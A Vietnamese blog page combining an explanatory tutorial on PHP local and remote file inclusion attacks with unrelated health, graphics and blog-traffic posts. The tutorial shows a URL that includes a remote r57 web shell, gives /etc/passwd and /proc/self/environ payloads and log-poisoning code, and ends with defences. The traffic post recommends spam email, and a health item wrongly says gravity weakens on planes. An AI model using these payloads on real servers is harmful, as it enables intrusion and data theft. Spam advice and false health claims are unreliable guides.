Go to Blogger edit html and replace these slide 2 description with your own words. ...
Go to Blogger edit html and replace these slide 3 description with your own words. ...
Go to Blogger edit html and replace these slide 4 description with your own words. ...
Go to Blogger edit html and replace these slide 5 description with your own words. ...
Chương 1. Giới thiệu về lập trình hướng đối tượng OOP
Chương 2. Giới thiệu về C++
Chương 3. Lớp và Đối tượng
Chương 4. Kế thừa
Chương 5. Tính đa hình
Chương 6. Khuôn hình
Trong vấn đề bảo mật web, kiểu khai thác lỗi File Include là một trong những lỗi nguy hiểm nhất. Lỗi này đã được biết đến từ lâu song hiện nay vẫn cực kỳ phổ biến. Vậy lỗi này như thế nào ? Vì sao bị lỗi ? Cách khai thác và phòng chống ra sao ?
Kiến thức bạn nên trang bị để hiểu bài này sâu hơn:
Lập trình PHP
Cơ bản về Apache
Cơ bản về Linux
Include theo tiếng Việt tạm dịch là bao gồm. Trong lập trình PHP có lệnh là include, require, require _ once, include _ once cho phép file hiện tại gọi đến một file khác.
Tùy thuộc vào mức độ bảo mật của server, kẻ tấn công có thể include file trên chính máy chủ đó (include local) hay include đến một file ở máy khác (include remote). Mục đích của kẻ tấn công là chạy được các hàm hệ thống và thu thập các thông tin nhạy cảm của hệ thống. Tất cả công việc trên kẻ tấn công có thể đạt được khi chạy được web shell (hay còn gọi là web hack tool) như c99shell, r57shell, …
Kẻ tấn công có web shell trong tay sẽ đọc được tất cả các file trong website đang chạy shell đó. Nếu server kém bảo mật thì kẻ tấn công có thể đọc được file của toàn bộ hệ thống, file của các website khác trên cùng máy chủ đó. Lỗi này hay được tấn dụng để tấn công local hack : kiểu tấn công máy chủ, website qua một site bị lỗi trên máy chủ. Nếu có quyền ghi, tất cả các file có thể bị thay đổi: deface trang chủ, chèn mã độc để thu thập thông tin đăng nhập, ẩn dấu backdoor để lần sau vào tiếp,… Kẻ tấn công cũng có thể lấy thông tin truy nhập cơ sở dữ liệu (database) qua file cấu hình của website, sau đó truy nhập vào cơ sở dữ liệu : ăn trộm dữ liệu, xóa, thay đổi dữ liệu,… Trong trường hợp này, cơ sở dữ liệu là MySql cho phép sử dụng hàm loadfile, thì kẻ tấn công có thể tận dụng để đọc file từ hệ thống và file của các site khác qua MySql bằng lệnh LOAD DATA LOCAL INFILE.
Ví dụ đoạn mã PHP include file:
…
include("config.php");
…
?>
Khi khai thác kẻ tấn công có thể include trực tiếp như trên hoặc có thể include một cách mềm dẻo như sau:
include($page);
?>
Khi đó nếu tham số register_globals trong file php.ini được đặt On thì biến $page sẽ là biến toàn cục, có thể gọi đến nó từ bất kì trang nào.
Nếu biến $page được sử dụng như sau: $ _ GET['page'], $ _ POST['page'], $ _ REQUEST['page'] hoặc $_COOKIE['page']
Khi đó $page sẽ có thể được gọi từ trình duyệt để include hoặc đọc file.
Ví dụ đọc file test.html : index.php?page = test.html
Hình 1. Include file từ server khác
Hình ảnh dưới đây minh họa việc đọc file boot.ini trên máy chủ windows thông qua biến script.
Hình 2. Include file từ server chủ
Các hàm có thể tận dung để khai thác include, require, require _ once, include _ once. Về cơ bản require và include giống nhau, chỉ có một điểm khác là nếu file không tồn tại thì có lỗi fatal-error và script dừng lại,không chạy tiếp.
Cách tìm lỗ hồng file includesion
Có 2 phương pháp để tìm ra lỗi này : kiểm thử hộp đen (Black- Box Testing) và kiểm thử hộp trắng (White-Box Testing).
Kiểm thử hộp trắng
Khi bạn có thể xem toàn bộ source code, áp dụng đối với phần mềm của bạn viết, phần mềm mã mở, phần mềm ai nhờ bạn test hộ,… Có thể có các chương trình để quét code hoặc bạn cũng có thể tự viết một đoạn mã làm việc này, thủ công nhất là tự dò bằng các trình soạn thảo thông dụng. Tìm các dòng có cú pháp tương tự như include($page) , điểm lưu ý là biến $page phải chưa được khởi tạo hoặc gán giá trị thì mới có lỗ hổng include file.
Một vài hình ảnh về shell c99, r57 (2 tool phổ biến nhất khi hack web với PHP):
Hình 3 . Hình ảnh hack tool shell c99
Hình 4. Hình ảnh hack tool shell r57
Ở 2 hình trên có thể thấy server chưa có bất kỳ một cấu hình bảo mật nào do đó qua web shell có thể truy nhập đến bất kỳ phần nào của hệ thống, thậm chí chạy được các lệnh hệ thống, hay mở các cổng để truy nhập từ xa vào hệ thống. Ví dụ mở cổng 2009 và telnet từ xa vào.
Hình 5. Công cụ bind port của r57
Hình 6. Kết nối vào sau khi bind port
Kiểm thử hộp đen
Kiểm thử hộp đen sử dụng khi bạn không có mã nguồn của mục tiêu, cũng hoàn toàn giống như khi attacker tấn công một hệ thống nào đó, chỉ có thể nhìn từ bên ngoài, đó cũng là lý do vì sao được gọi là hộp đen.
Phương pháp là thử các dữ liệu đầu vào, bất kỳ dữ liệu nào, khi ứng dụng bắn ra lỗi là bạn có thêm thông tin. Để có thể tìm ra lỗi thì có thể kiểm thử bằng công cụ quét, kiểm thử “bằng tay”. Theo kinh nghiệp của tôi, đối với lỗi này các chương trình quét tỏ ra rất kém hiệu quả, với người có kinh nghiệm thì lỗi này đôi khi chỉ cần lướt qua website một vài lần cũng có thể nhận thấy được.
Ví dụ bạn thấy có các link dạng: www.example.com/index.php?page=downloads.html như vậy sẽ rất có khả năng là biến page có lỗi inlcude file, bạn cần thử cụ thể hơn bằng cách đọc thử các file khác.
Hình 6. Đọc file /etc/passwd qua lỗi include
Ví dụ : www.example.com/index.php?page=otherfile.html ,... nếu nhận được lỗi
Warning:
include(otherfile.html) [function.include]: failed to open stream: No such file or directory in /home/site/public_html/ index.php on line x.
Thì có nghĩa là file đó không tồn tại.
Một trong các file có thể dùng để kiểm tra và có thêm thông tin là robots.txt.
Hình 7. Đọc file qua lỗi include
Tìm lỗi qua các máy tìm kiếm
Có thể trực tiếp tìm thông tin về lỗi của mục tiêu qua các trang tìm kiếm hay qua các trang thông báo lỗi như http://www.milw0rm.com nếu đã biết tên phần mềm trang web mục tiêu dùng.
Hình 8. Trang milw0rm.com
Dùng Google CodeSearch
Cú pháp : lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
Hình 9. Tìm lỗi qua Google Code Search
Null-Byte
Trong một số trường hợp include được dùng như sau:
include($page.".html");
Khi đó chỉ các file .html mới được include, vậy làm sao để đọc được file khác?
Null-byte sẽ cho phép đọc file khác bằng cách thêm null byte vào cuối file cần đọc.
Đọc file /etc/passwd
index.php?page =/ etc/passwd
Khi đó include("/etc/passwd.html"); trở thành include("/etc/ passwd");
Tuy nhiên không phải lúc nào nul-bite cũng có tác dụng, tùy thuộc webserver, code,…
Khai thác lỗ hổng (Exploiting)
Khi phát hiện ra lỗi làm sao có thể khai thác được? Phần trên phần nào bạn cũng đã nhận thấy một số cách khai thác. Về cơ bản có hai kiểu khai thác là inclde file từ máy chủ khác (RFI – Remote file include), include file từ chính máy chủ lỗi (LFI – Local file include).
Remote file include (RFI)
Khi bị lỗi này tức là tham số register_globals=On, với lỗi này người không cần có nhiều kiến thức về lập trình cũng dễ dàng khai thác được thông tin. Kẻ tấn công chỉ cần đặt file web hack tool trên một máy chủ nào đó (thường là host miễn phí) và include qua lỗi.
http://lab.vnsecurity.vn/index.php?page=http://remote.vnsecurity.vn/r57.txt
File được include vào là file r57.txt từ host remote.vnsecurity.vn. Kết quả tham khảo hình 1.
Local file include (LFI)
Nếu tham số allow_url_fopen trong file php.ini đặt là Off thì sẽ không thể thực hiện include file từ máy chủ khác. Khi đó chỉ khai thác được dạng include trên cùng máy chủ, cũng tùy cấu hình server an toàn hay không mà attacker có thể đọc được file ngoài thư mục của website có lỗi. Khi đó để có thể khai thác tốt cần có một web shell trên máy chủ, làm sao để có được web shell? Có thể có nhiều cách nhưng đòi hỏi người khai thác phải có kinh nghiệm và hiểu biết về PHP, apache, Linux. (Trên Windows cũng tương tự nhưng có một số điểm khác, tôi không trình bày ở tài liệu này).
Một trong các điểm quan trọng trong khai thác LFI là đọc các file nhạy cảm của hệ thống, website. Một số file quan trong đối với hệ điều hành Linux /etc/passwd, /etc/group, httpd.conf,…
File /etc/passwd chứa thông tin về tài khoản của hệ điều hành. Attacker có thể lấy tên tài khoản và đùng hình thức dò quét mật khẩu, thường là Brute force (dân lập trình thường gọi là duyệt trâu 
). Nếu mật khẩu không được shadowed, thì password được mã hóa sẽ nằm luôn trong file /etc/passwd, có được file này attacker có thể có được mật khẩu bằng cách crack (dùng John the Ripper chẳng hạn). Còn nếu không mật khẩu mã hóa nằm trong /etc/shadow (có thể ở thư mục khác đối với các bản Linux và Unix).
Ví dụ cú pháp trong shadow :
guru:$1$OiD7e.JO$AGoOmlOsUK1XBw2qJcx4z0:14286:0:99999:7:::
File httpd.conf là file cấu hình của webserver Apache, fiel này chứa rất nhiều thông tin về hệ thống. Thông tin quan trọng đối với việc khai thác là error_log, access_log, DocumentRoot,…
Một số file quan trọng của website như .htaccess , file cấu hình chứa mật khẩu của database (thường là config.inc, configuration.php,…)
LFI cũng được dùng kết hợp với lỗi upload để có được web shell. Nếu lỗi upload file có thể up được trực tiếp web shell lên và chạy được thì không cần dùng đến LFI. Nhưng nếu có lỗi upload, chỉ upload được các file ảnh,… thì có thể tận dụng LFI. Việc cần làm là định vị ví trí file ảnh nhiệm vụ này khó hay không tùy thuộc kinh nghiệm tường người .
Trong việc upload ảnh lên cũng có rất nhiều kiểu tùy thuộc code của chương trình upload. Nếu chỉ lọc đuôi file thì đơn giản bạn chỉ cần đổi tên web shell từ .php sang đuôi của ảnh .jpg chẳng hạn. Nếu chương trình upload kiểm tra xem có đúng là ảnh không thì làm sao để chèn code PHP vào file ảnh ? Phần dưới tôi sẽ nói về chèn code vào file ảnh mà vẫn là file ảnh thực sự.
Hình 10. Include code PHP từ file ảnh
Ẩn code PHP và cách dấu shell
Có nhiều chỗ có thể ẩn code PHP như trong chính file PHP, file log, file ảnh hay bất kỳ file gì.
Chèn PHP vào ảnh
Như ở trên tôi đã nói chèn code PHP vào ảnh để làm gì ? Ở đây chèn code PHP vào file ảnh mà file ảnh đó vẫn là một file ảnh thực sự. Vậy chèn code PHP vào phần nào của ảnh ? Ta sẽ thêm code PHP vào phần comment của ảnh, tuy nhiêm phần này không chứa được nhiều code php, nếu shell quá lớn sẽ không được, do đó phần này thường chèn đoạn mã ngắn như shell command, upload form,…
Có 2 chương trình phổ biến để chèn code PHP vào ảnh là :
+ edjpgcom.exe dùng cho Windows
Download : http://guru.net.vn/content/binary/edjpgcom.zip
Hình 11. Giao diện edjpgcom
Hình 12. File ảnh sau khi đã thêm code PHP, không có gì thay đổi
Hình 13. Kết quả include file ảnh có chứa code upload
+ jhead cho Linux và Windows
Download : http://freshmeat.net/projects/jhead/
Hình 14. Hình ảnh jhead
Hình 15. Chạy hàm hệ thống qua code chèn trong ảnh
Code PHP trong logfil
Mỗi một website khi chạy, toàn bộ thông tin truy cập, lỗi,… sẽ được máy chủ lưu lại. Log truy cập thông thông thường được gọi là log truy cập của site. Ngoài ra có lỗi khác đối với webserver được lưu trong file access_log, error_log (tên file này là mặc định, có thể đổi tên khác trong httpd.conf).
Ví dụ minh họa dưới đây cho thấy việc chèn code / vào file log.
Tạo 1 file fopen.php như sau:
$res = '';
$fp = fsockopen('127.0.0.1', 80);
if(!$fp){
echo "No connection";
}
fputs($fp, "GET / HTTP/1.1\r\n");
fputs($fp, "Host: 127.0.0.1\r\n\r\n");
while(!feof($fp)){
$res .= fgets($fp, 128);
include($_GET['page'].".php");
}
echo $res;
?>
Hình 16. Tạo request lỗi
Hình 17. File log ghi nhận lỗi có chứa mã PHP
Hình 18. Include file log
Trong một vài trường hợp một số phần của website lưu dữ liệu ra file text ví dụ như maillist, blogroll,..
Thường thì phần này sẽ lưu thông tin người dùng thông thường có thể thêm vào. Khi đó có thể chèn code PHP vào các file này. Việc còn lại là định vị file này. Để làm được điều đó cần quan tâm đến một số file như .htacces, file config của site,…
Ví dụ đoạn code lỗi:
echo '
echo 'E-Mail Address';
echo '';
echo '';
echo '';
if(isset($_POST['submit'])){
$data = $_POST['email'];
$fp = fopen("data.txt","a+");
$wr = fwrite($fp,$data);
fclose($fp);
}
?>
File dữ liệu là file data.txt, có thể tận dụng file này để khai thác.
Kết hợp file include và SQL Injection
Với một số phần mềm hiện nay, hay có thêm phần module phát hiện những tấn công thông dụng như SQL injection. Ví dụ với CMS PHP-Nuke có đoạn code như sau :
$REQ = print_r($_REQUEST,true);
$ip = 'IP: '.$_SERVER['REMOTE_ADDR'];
$time = 'Date: '.date("d.m.y - H:i:s");
$ref = 'Referer: '.$_SERVER['HTTP_REFERER'];
$browser = 'Browser: '.$_SERVER['HTTP_USER_AGENT'];
if(eregi('UNION',$REQ) && eregi('SELECT',$REQ)){
$fp = fopen("attacks.txt","a+");
fwrite($fp,"$REQ\n $ip\n $time\n $browser\n $ref\n");
fclose($fp);
header('Location: http://www.google.com');
}
?>
Khi đó các request từ trình duyệt có từ UNION và SELECT thì sẽ ghi lại toàn bộ URL request,.. vào file attacks.txt.
Như vậy có thể chèn mã PHP vào file đó như sau:
http://www.example.com/index.php?id= UNION SELECT
Code PHP trong /proc
/proc là một thư mục cho phép giao tiếp giữa nhân hệ điều hành (kernel) với với người dùng của hệ điều hành (user). Tất cả các file trong /proc không có trên đĩa cứng nó tồn tại trong RAM.
Trong phần này có thể lợi dụng để chèn code qua Referer, phần code này sẽ được lưu trong file nằm trong thư mục có tên trùng với process ID Apache đang chạy site đó. Tìm được file này cũng có thể include được.
Code minh họa:
$res = '';
$fp = fsockopen('www.lab.vnsecurity.com', 80);
if(!$fp){
echo "hi!.";
}
fputs($fp, "GET /index.php?page=/proc/self/environ HTTP/1.1\r\n");
fputs($fp, "Referer: \r\n");
fputs($fp, "Host: www.lab.vnsecurity.com\r\n\r\n");
while(!feof($fp)){
$res .= fgets($fp, 128);
}
echo $res;
?>
Cách chống tấn công File Inclusion
Quan phần trên bạn đã có thể hình dung lỗi như thế nào, tấn công ra sao? Vậy làm gì để chống lại các tấn công inlude file?
Về cơ bản có 2 việc phải làm:
Server an toàn
Lập trình an toàn (cái này rất quan trọng vì code có thể triển khai ở nhiều server)
Server an toàn
Để có một server an toàn không hề đơn giản nó đòi hỏi bạn phải hiểu về các cái mình cài đặt và có kinh nghiệm về bảo mật cũng như quản trị. Phần này tôi chỉ nói các phần liên quan đến file include thôi.
Trong php.ini đặt các tham số allow_url_fopen=Off (allow_url_fopen=Off) , register_globals=Off, Safe_mode=On, display_error=Off
Đặt quyền cho các thư mục hợp lý
Lập trình an toàn
Bắt lỗi chặt chẽ
Bất cứ biến nào cũng cần khởi tạo
Sử dụng đường dẫn tuyệt đối
Một ví dụ code chặt chẽ:
$whitelist = array('index.html', 'downloads.html', 'info.html');
$page = $_GET['page'];
if(in_array($page,$whitelist)){
include($page);
}else{
die("Attack attempt");
}
?>
Cuối cùng, chúc bạn có hiểu biết về file include và có phát hiện và ngăn chặn các tấn công kiểu này.
Goodluck!
Tham khảo : hakin9, http://www.milw0rm.com/papers/232 , http://www.owasp.org
Tác giả:
Phạm Đức Hải
Also post : VnSecurity.vn Tấn công File Inclusion (File Inclusion Attacks)
Bạn hãy suy nghĩ xem liệu mình có mắc phải một trong những thói quen “vặt vãnh” sau đây không nhé. Nếu có, hãy điều chỉnh lại nhịp điệu cuộc sống của bạn, tìm ra quy tắc giữ gìn sức khoẻ đúng đắn hơn.
1. Hàng ngày đi một đôi giày không thay
Do chân và các bộ phận khác trong cơ thể chúng ta có thể ra mồ hôi, vì vậy giày sau khi đi một ngày đều trở nên ẩm ướt và ít nhất cần 24 tiếng sau mới có thể hoàn toàn khô ráo, thông thoáng. Mỗi ngày bạn chỉ đi một đôi giày sẽ làm cho chân trong một thời gian dài ở trong trạng thái ẩm ướt, và cũng sẽ dễ sinh ra vi khuẩn gây bệnh.
Khuyến nghị: Nên chuẩn bị 2 - 3 đôi giày thay đổi. Khi về nhà cần đi dép thông thoáng để cho giày có cơ hội “nghỉ ngơi” sau một ngày “làm việc” mệt mỏi và để cho chân thoáng khí.
2. Mặc quần áo bó sát
Quần áo bó sát giúp “khoe” đường cong hoàn mỹ của cơ thể nhưng nếu vẫn mặc bộ cũ khi cơ thể đã lên "size" thì sẽ dễ xuất hiện tình trạng chèn ép các cơ quan nội tạng, gây ra đau bụng, chướng bụng, tăng thêm gánh nặng cho tim, từ đó gây ra cảm giác mệt mỏi và không thoải mái.
Nếu mặc quần quá chật sẽ làm cho vị toan chạy ngược trở lại. Vị toan chảy ngược sẽ kích thích thực quản, gây ra tức ngực, đau ngực. Đồng thời, mặc quần bó sát trong thời gian dài không có lợi cho việc vận hành đào thải khí thể trong cơ thể, gây ra chướng bụng, và các triệu chứng được gọi là “không thông gây ra đau”.
Khuyến nghị: Ngoài mục đích giảm béo, bạn nên mua sắm cho mình những bộ quần áo rộng rãi thoáng mát để thay thế với những bộ quần áo bó sát.
3. Giặt quần áo tiết kiệm nước
Mặc dù tiết kiệm nước là một hành động bảo vệ môi trường rất tốt nhưng nếu khi giặt quần áo quá tiết kiệm nước, không gột hết bột giặt và chất bẩn trên quần áo sẽ dẫn tới các bệnh về da.
Khuyến nghị: khi giặt quần áo, nên dùng nước thì dùng nước, phải giặt sạch hết các chất bẩn và xà phòng trên quần áo, đừng nên “nhắm mắt” tiết kiệm nước để gây nguy hại cho sức khoẻ của bạn.
4. Xách đồ quá nặng
Xã hội hiện đại ngày nay “nam nữ bình đẳng” trong tất cả mọi thứ, những việc lao động chân tay nặng nhọc trước đây chỉ dành cho nam giới bây giờ phụ nữ yếu ớt cũng có thể đảm nhận được. Nhưng chị em phụ nữ đừng nên “gánh vác trách nhiệm” mà không chú ý đến sức lực của mình, đi làm những việc vượt quá khả năng chịu đựng của cơ thể.
Các bác sỹ cho biết rất nhiều trường hợp gãy xương, trật xương thậm chí sái hàm đều do gánh, xách vác đồ quá nặng gây ra.
Khuyến nghị: Đừng nên “đày đọa” cơ thể. Những đồ vật quá nặng không xách được thì không nên xách. Khi xách, vác đồ vật nặng thì cố gắng hết sức để cho vật nặng gần với cơ thể.
5. Đi chân trần khi thức giấc
Rất nhiều bệnh về chân xuất phát từ đây. Mỗi ngày chân chúng ta phải “chịu đựng” trọng lượng nặng của toàn bộ cơ thể, vì vậy hàng ngày đều có một số bộ phận trên chân chịu tổn thương ở một mức độ nhất định. Những tổn thương này đều cần thông qua thời gian nghỉ ngơi buổi tối để phục hồi. Nếu buổi sáng thức dậy đi chân trần, sẽ tăng thêm gánh nặng của gót chân, những “tổ chức” vừa được khôi phục vào ban đêm cũng vì đó mà thêm một lần nữa bị tổn thương và tổn thương nặng thêm.
Khuyến nghị: Buổi sáng ngủ dậy hoặc buổi tối khi ở nhà nên đi dép đế bằng.
6. Kẹp tai nghe ở vai để nghe điện thoại
Động tác này rất dễ gây ra đau cơ bắp phần cổ và lưng. Để tránh tai nghe bị trơn tuột, nhiều người rất “tự nhiên” kẹp chặt ống nghe, điều này sẽ làm tăng thêm gánh nặng cơ bắp phần cổ và lưng. Hơn nưa, cơ bắp giữa cổ và lưng trong thời gian dài chịu “căng thẳng” sẽ xuất hiện hiện tượng co rút cơ bắp.
Động tác “tụ nhiên” này còn có thể gây ra các bệnh nặng hơn. Một người bệnh ở Pháp do thời gian dài kẹp điện thoại giữa cằm và vai để nghe đã bịa mù mắt trái và nói chuyện cũng gặp nhiều khó khăn.
Khuyến nghị: Khi nghe điện thoại bạn nên sử dụng tai nghe, dùng chế độ không cần nhấc máy hoặc giữ tư thế ngồi đúng.
7. Tuỳ tiện gục đầu ngủ
Do công việc bận rộn, hoặc do điều kiện hạn chế, rất nhiều người “bạ đâu ngủ đấy”. Trên ghế, trên xe, bất cứ chỗ nào tiện lợi là có thể gục đầu xuống ngủ được ngay.
Ngủ là một quá trình khôi phục thể lực, tiêu trừ mệt mỏi. Nếu không để cho cơ thể thư giãnmột cách thoải mái, đầy đủ, ngủ sẽ không thể phát huy tác dụng vốn có của nó, mà còn có thể gây ra nhức mỏi thậm chí tê mỏi cơ bắp.
Khuyến nghị: Bạn nên tránh ngủ ở nơi không phải là giường. Nếu điều kiện thực sự không có thì nên ngủ một lúc rồi dậy một lúc, như thế cũng tốt hơn là ngủ ở một nơi không thoải mái.
8. Không rửa bàn chải đánh răng
Bàn chải đánh răng cần phải rửa sao? Đúng như thế. Bàn chải đánh răng mỗi ngày đều đến “tham quan” miệng của chúng ta 1 - 2 lần, đương nhiên không nên xem nhẹ vệ sinh của nó. Trên thực tế, khi bàn chải đánh răng “rửa” khoang miệng cho chúng ta, sẽ lây nhiễm các loại chất bẩn bao gồm vi khuẩn, thêm vào đó là bàn chải đánh răng ở trong môi trường vệ sinh ẩm ướt, vi khuẩn càng dễ sinh trưởng. Một nghiên cứu cho thấy bàn chải đánh răng sau khi sử dụng 15 ngày, nếu không “tắm rửa” cho nó sẽ sinh ra vi khuẩn.
Khuyến nghị: Sau khi đánh răng cần phải rửa sạch bàn chải, đặc biệt chú ý rửa sạch thức ăn và kem đánh răng còn lưu lại bên trên. Người vừa hết bệnh cảm nhất định phải nhớ thay bàn chải đánh răng mới.
9. Ngồi “bất động” trên máy bay
Thời gian dài ngồi “giữ ghế” sẽ tăng thêm áp lực cho cơ khớp chân và phần lưng, thậm chí sẽ gây ra tụ máu, máu vón cục. Ngồi lâu “bất động” ở trên máy bay lại càng nguy hiểm. Sức hút của quả đất làm cho huyết dịch chảy vào tim nhưng trên máy bay, lực hút của trái đất yếu đi rõ rệt, máu dễ chảy vào phần phổi. Nếu bị hiện tượng máu vón cục thì sẽ có thể dẫn tới chết người do tắc nghẽn phổi.
Khuyến nghị: Khi ngồi trên máy bay, không nên ngồi yên một chỗ, nên đứng dậy đi lại vận động.
10. Thời gian dài không chớp mắt
Đây là thói quen phổ biến ở “dân” văn phòng, thường xuyên tiếp xúc với máy tính, mắt chỉ nhìn chăm chăm vào màn hình máy tính, cả mấy phút liền cũng không chớp mắt. Điều này có thể gây ra hội chứng ở mắt do máy tính như hay chảy nước mắt, thị lực sút giảm, cảm giác không thoải mái khi đeo kính áp tròng...
Khuyến nghị: Mắt nhìn trong một thời gian ngắn cần phải chú ý nghỉ ngơi, chớp chớp mắt là cách đơn giản và hữu hiệu nhất.
Việt Anh
| Làm cầu vồng trong COREL |
Vẽ hai hình tròn và Combine lại thành hình vành khăn  Click tam giác nhỏ của Fill Tool trên hộp công cụ và chọn Fountain Fill. Trong hộp thoại Fountain Fill chọn Type = Radian; trong ô List Reset xổ ra chọn một trong các kiểu RainBow. OK  Hình của cầu vồng không vừa ý bạn? bạn click tiếp Interactive Fill Tool để sửa trực quan cách thể hiện mầu.  Theo dohoavn |
Lần đầu tiên khi chạy chương trình, hộp thoại Language sẽ xuất hiện yêu cầu bạn chọn ngôn ngữ cho giao diện, bạn hãy bấm chọn English. Để đóng khung cho ảnh, bạn thực hiện như sau: - Bấm nút Open Image (hoặc nhấn Ctrl+O) để chọn file ảnh cần đóng khung. - Tiếp tục, bấm nút Choose Border (Ctrl+F), chọn loại khung bên hộp Types of borders và chọn một khung mà bạn thích trong hộp bên phải. Lưu ý rằng, tuỳ kích cỡ hình ảnh (ngang hay dọc) mà bạn chọn khung cho phù hợp. Sau khi chọn xong, hình sẽ được đóng khung ngay lập tức. Bạn có thể điều chỉnh hình ảnh để vừa vặn trong khung bằng cách dùng các phím mũi tên di chuyển. Để chọn màu cho đường kẻ khung, bạn hãy dùng nút Border Color. Để chọn loại khung khác, bạn hãy làm lại tương tự. - Sau khi đã có một hình ảnh như mong muốn, bạn có thể lưu ảnh lại bằng nút Save Image (Ctrl+S), in hình bằng nút Print Image (Ctrl+P). Muốn download nhiều khung khác, bạn phải kết nối Internet và dùng nút Download more borders (Ctrl+L). Chương trình tương thích mọi Windows, tải dùng thử tại http://artisticsoftware.com/setup_ab_en.exe, dung lượng 2,09MB. Theo vietnamlab |
Từ trước tới giờ có biết bao nhiều cách và thủ thuật giúp các blogger tăng traffic cho blog của mình tuy nhiên không có nhiều blogger thành công bởi thủ thuật không phải là tất cả mà nó còn cần nhiều các yếu tố khác nữa. Tuy nhiên, để bước đầu tạo dựng hương hiệu cho blog thì việc làm đầu tiên mà các blogger luôn ưu tiên đó là traffic.
Nhiều công ty sẵn sàng bỏ ra cả đống tiền quảng cáo tràn ngập trên các mạng như Google Adwords, AdBrite, Bidvertiser thậm trí là mua banner trên các trang nổi tiếng nhằm xây dựng thương hiệu và hình ảnh trong khi các blogger thì không thể mua nổi host hay domain thì nói gì đến mua traffic. Vì thế, giải pháp tăng traffic miễn phí từ các nguồn khác nhau luôn là sự lựa chọn đúng đắn.
Mình đã từng giới thiệu một vài chương trình trao đổi traffic miễn phí nhưng dường như không mang lại nhiều lợi ích. Chính vì thế mà hôm nay xin tổng hợp thêm 10 cách tăng traffic miễn phí và hiệu quả nữa hy vọng giúp được các bạn ít nhiều. Nhiều blogger đã và đang sử dụng một trong những cách này và cũng thấy hiệu quả nhất định.
1 – Đăng các mẩu quảng cáo miễn phí:
Đăng các mẩu quảng cáo miễn phí trên các trang như Craigslist và Kijii có thể là một cách khá hiệu quả để quảng bá cho blog của bạn. Đây là 2 trong số các trang khá nổi tiếng và luôn tiềm ẩn lượng khách hàng lớn tới blog của bạn. Còn việc có giữ được khách hàng lần đầu ghé thăm ở lại blog của mình hay không phụ thuộc vào nội dung mà bạn đăng tải. Tuy nhiên, dạng free classifieds này thường có thời gian nhất định và bạn phải vào đăng lại. Đó cũng là cách bạn tặng traffic cho các trang cung cấp dịch vụ này.
Ở Việt Nam thì mình hay đăng trên RongBay.com vì thấy có hiệu quả ít nhiều. Bạn có quyền up tin lên top trong 4 lần. Sau khi hết quyền up thì nên xóa tin và tạo tin mới y trang để lại có thêm quyền up nhé.
2 – Đăng bài trên các diễn đàn:
Để tối ưu hiệu quả bạn nên chọn các forum có các chủ đề liên quan đến chủ đề blog của bạn hoặc tham gia các box có liên quan vì ở đó thường có các bạn đọc cùng sở thích nên việc họ ghé thăm blog của bạn thường xuyên rất khả quan. Bạn nên đăng bài để tạo uy tín, đừng nghĩ tham gia một forum rồi đăng lung tung, quảng cáo một cách lỗ liễu vì không những bạn bị admin xoá account mà các thành viên khác khi nhìn thấy là không muốn xem rồi.
Cách không quảng cáo lộ liễu là đăng các chủ đề thuộc bõ đó và nên quảng cáo dưới signature vì nó vừa an toàn mà lại không sợ bị admin khoá tài khoản.
BlogViet cũng đặt chữ ký các bài nổi bật trên ddth.com và thấy khá hiệu quả khi kiếm tra trên Google Analytics.
3 – Gửi bài viết:
Phải thừa nhận là viết bài và gửi lên các trang uy tín có tác dụng rất lớn trong việc tăng traffic và quảng bá blog của mình. Trước đây, BlogViet cũng chăm viết bài bằng Tiếng Anh và gửi lên HubPages và EzineArticles và nhận được khá nhiều traffic một ngày và cũng có nhiều người theo đuôi. Tuy nhiên, để viết 1 bài tiếng anh trong niche mà mình chọn sẽ mất rất nhiều thời gian so với viết bằng Tiếng Việt. Nếu các bạn có một chút khả năng về tiếng Anh thì nên thử cách này vì nó mang lại nhiều lợi ích đó là non-reciprocal link (link một chiều) từ các trang này, và được đánh giá cao trên các trang công cụ tìm kiếm như Google, Yahoo hay MSN giống như bài viết về SEO ký sinh của mình trước đây.
Ở Việt Nam thì bạn nên đăng ký vào trang Một Trăm Độ hay Góc Nhìn vì các trang này dùng công cụ truy xuất feed nên không cần làm gì mà vẫn có thể đăng bài trên các trang đó hoàn toàn miễn phí.
4 – Free Directories
Cũng giống như Gửi bài viết, có rất nhiều free directory như MyBloglog, BlogCatalog… mà bạn có thể đăng blog theo các thư mục khác nhau. Lượng trahic tại các trang này rất lớn và việc thu hút traffic tới blog của bạn là khả thi. Nếu blog của bạn có nội dung tốt về một chủ đề nào đó thì blog của bạn có thể được liệt kê vào thư mục niche đó và hiển nhiên là sẽ có rất nhiều khách hàng tiềm năng tới blog của bạn.
Ở Việt Nam hiện chưa có nhiều các directory như thế, có chăng là trang vinatop.net mà BlogViet đang dùng. Tuy nhiên, chúng ta đã quá quen thuộc với các directory như đã nói ở trên rồi, hay tận dụng nó vì bạn chẳng mất gì cả.
5 – Trao đổi liên kết
Trao đổi liên kết thường không giúp blog của bạn được ưu tiên trên các trang tìm kiếm so với link một chiều (non-reciprocal) – do người đọc tự nguyện đặt khi thấy hữu ích. Tuy vậy, trao đổi link vẫn có tác dụng trong việc tăng traffic cho blog. Quan trọng hơn là nó hoàn toàn free. Đó cũng giải thích cho việc tại sao Google rất ghét việc mua/bán link và có thể trừng phạt PR đối với các blog lạm dụng việc này để kiếm tiền. Lời khuyên của mình là chỉ nên liên kết với các blog cùng chủ đề thì PR của bạn sẽ được cải thiện nhanh hơn.
6 – Gửi email:
Đây là định dạng mà chúng ta thường gọi làm spam email. Bạn có thể mua hoặc tự thu thập các địa chỉ email và gửi các mẩu quảng cáo định kỳ tới các email này. Việc này BlogViet không thích vì gây khó chịu nhưng ít nhất cũng có ích bởi rất nhiều công ty đang dùng thủ thuật này để bán hàng và giới thiệu sản phẩm. Bạn cũng có thể mua danh sách đó để triển khai thử xem.
Tại sao email của bạn lại có trong danh sách đó? Có nhiều cách email của bạn được thu thập vào các danh sách đó từ việc tham gia các forum, chat chít, hoặc nhận các sản phầm free có yêu cầu điền email ….
7 – Chọn các theme đã được tối ưu khả năng SEO
Theo kinh nghiệm của mình thì không nên chọn các theme quá phức tạp về cấu trúc vì nó sẽ gây cản trở cho các công cụ tìm kiếm và ngẫu nhiên bạn sẽ bị mất traffic chỉ vì theme của mình chưa được tối ưu khả năng SEO. Đây không phải là nhận định của BlogViet mà là khuyến cáo của Google.
